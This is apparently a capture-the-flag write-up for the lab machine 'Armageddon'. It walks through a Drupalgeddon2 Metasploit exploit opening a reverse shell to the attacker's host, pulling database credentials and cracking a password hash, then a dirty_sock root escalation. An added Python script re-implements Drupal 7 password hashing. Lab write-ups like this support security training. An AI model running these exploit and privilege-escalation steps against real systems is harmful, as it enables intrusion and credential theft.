Armageddon Writeup





Nmap

 

 PORT  STATE SERVICE VERSION  
 22/tcp open ssh   OpenSSH 7.4 (protocol 2.0)  
 | ssh-hostkey:   
 |  2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)  
 |  256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)  
 |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)  
 80/tcp open http  Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)  
 |_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D  
 |_http-generator: Drupal 7 (http://drupal.org)  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 | http-robots.txt: 36 disallowed entries (15 shown)  
 | /includes/ /misc/ /modules/ /profiles/ /scripts/   
 | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt   
 | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt   
 |_/LICENSE.txt /MAINTAINERS.txt  
 |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16  
 |_http-title: Welcome to Armageddon | Armageddon  
 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).  

 PORT 80: http

 PORT 22: ssh

robots.txt lists lots of disallowed paths, so it's time to enumerate.

ENUMERATION

port 80

Next, grab robots.txt: it lists lots of hidden files worth enumerating. But first, check Wappalyzer to see what type of CMS the site is using.


CMS identification


This machine is using the 'Drupal 7' CMS. I think the 7 is the version number? Yep...

and the OS is CentOS.


After some googling I found lots of exploits for it; there is a Metasploit module as well.

GET INITIAL SHELL

           

 msfconsole -q  
 msf6 > use exploit/unix/webapp/drupal_drupalgeddon2  
 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 10.10.10.233  
 RHOSTS => 10.10.10.233  
 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set LHOST 10.10.14.58  
 LHOST => 10.10.14.58  
 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options  
 Module options (exploit/unix/webapp/drupal_drupalgeddon2):  
   Name     Current Setting Required Description  
   ----     --------------- -------- -----------  
   DUMP_OUTPUT false      no    Dump payload command output  
   PHP_FUNC   passthru     yes    PHP function to execute  
   Proxies            no    A proxy chain of format type:host:port[,type:host:port][...]  
   RHOSTS    10.10.10.233   yes    The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'  
   RPORT    80        yes    The target port (TCP)  
   SSL     false      no    Negotiate SSL/TLS for outgoing connections  
   TARGETURI  /        yes    Path to Drupal install  
   VHOST             no    HTTP server virtual host  
 Payload options (php/meterpreter/reverse_tcp):  
   Name  Current Setting Required Description  
   ----  --------------- -------- -----------  
   LHOST 10.10.14.58   yes    The listen address (an interface may be specified)  
   LPORT 4444       yes    The listen port  
 Exploit target:  
   Id Name  
   -- ----  
   0  Automatic (PHP In-Memory)  
 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run  
 [*] Started reverse TCP handler on 10.10.14.58:4444   
 [*] Sending stage (39282 bytes) to 10.10.10.233  
 [*] Meterpreter session 1 opened (10.10.14.58:4444 -> 10.10.10.233:60416) at 2021-03-28 12:10:11 +0530  

 


Some enumeration

cd sites/


 bash-4.2$ cd sites  
 bash-4.2$ ls  
 README.txt  
 all  
 default  
 example.sites.php  
 bash-4.2$ cd default  
 bash-4.2$ ls  
 default.settings.php  
 files  
 settings.php  
 bash-4.2$ cat settings.php  

 

 

MySQL creds


Credentials for MySQL, taken from settings.php:

username ----- drupaluser

password ------- CQHEy@9M*m23gBVj


Log in to MySQL as the drupal user:


 mysql -u drupaluser -h localhost -p'CQHEy@9M*m23gBVj'  
 use drupal;  
 show tables;  
 select * from users;  

 

 


We got the admin username and password hash:

username ---- brucetherealadmin

hash  ----- $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt


Crack the hash with John


I had already cracked it, so I used John's --show option.


The password for this hash is 'booboo'.
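As an added example (not part of the original writeup), here is a Python re-implementation of the Drupal 7 `$S$` password scheme that John is testing candidates against: the character after `$S$` encodes the iteration count (`D` is index 15 in Drupal's alphabet, so 2^15 rounds of SHA-512), the next 8 characters are the salt, and the output is phpass-style base64 truncated to 55 characters. The constants mirror Drupal 7's password.inc; the function names are my own.

```python
import hashlib
import hmac

# Alphabet and limits from Drupal 7's includes/password.inc.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55      # stored hashes are truncated to this length
DRUPAL_MIN_HASH_COUNT = 7    # accepted log2 bounds for the iteration count
DRUPAL_MAX_HASH_COUNT = 30


def _encode64(data: bytes) -> str:
    """phpass-style base64: each 3 little-endian bytes become 4 chars, no padding."""
    out = []
    for j in range(0, len(data), 3):
        chunk = data[j:j + 3]
        value = int.from_bytes(chunk, "little")
        for k in range(len(chunk) + 1):          # 1 byte -> 2 chars, 2 -> 3, 3 -> 4
            out.append(ITOA64[(value >> (6 * k)) & 0x3F])
    return "".join(out)


def parse_setting(stored: str):
    """Return (count_log2, salt) from the 12-character setting prefix of a $S$ hash."""
    setting = stored[:12]
    if len(setting) != 12 or not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 SHA-512 hash")
    count_log2 = ITOA64.index(setting[3])
    if not DRUPAL_MIN_HASH_COUNT <= count_log2 <= DRUPAL_MAX_HASH_COUNT:
        raise ValueError("iteration count out of range")
    return count_log2, setting[4:12]


def drupal7_hash(password: str, stored: str) -> str:
    """Recompute the hash for `password` with the salt and cost taken from `stored`."""
    count_log2, salt = parse_setting(stored)
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):             # 'D' -> 2**15 = 32768 rounds
        digest = hashlib.sha512(digest + pw).digest()
    return (stored[:12] + _encode64(digest))[:DRUPAL_HASH_LENGTH]


def verify(password: str, stored: str) -> bool:
    """Constant-time comparison of the recomputed string with the stored one."""
    return hmac.compare_digest(drupal7_hash(password, stored), stored)


if __name__ == "__main__":
    # Hash copied from the writeup above; 'booboo' is the cracked password.
    h = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"
    print(parse_setting(h))      # (15, 'gL2gjv6Z')
    print(verify("booboo", h))   # True
```

The cost is what makes cracking slow: every candidate costs 32769 SHA-512 calls, which is why a weak password like this one falls quickly while a long random one would not.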


Let's try SSH login.


USER.TXT


user.txt


ROOT.TXT


(root) NOPASSWD: /usr/bin/snap install *


This misconfiguration makes it vulnerable to dirty-sock :)

Here is the explanation of dirty-sock:

https://initblog.com/2019/dirty-sock/

 

Simple steps to root

 

Copy and paste this command:

 python2 -c 'print "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" + "A"*4256 + "=="' | base64 -d > root.snap  

 

It saves the snap as root.snap.


Then run these commands to pwn :)


 

 sudo /usr/bin/snap install --devmode root.snap  
 su dirty_sock  
  password: dirty_sock  
   
 and   
   
 sudo -s  
 password: dirty_sock  
   
   
 we are root  

 Sometimes the machine is slow and the exploit does not work; in that case, log in again via SSH and try again.


Root.txt



 [root@armageddon brucetherealadmin]# id&&hostname  

 uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023  

 armageddon.htb  

 [root@armageddon brucetherealadmin]# cat /root/root.txt  

 03a85b8d31d8d829139001ad97e668cb  

 [root@armageddon brucetherealadmin]#  
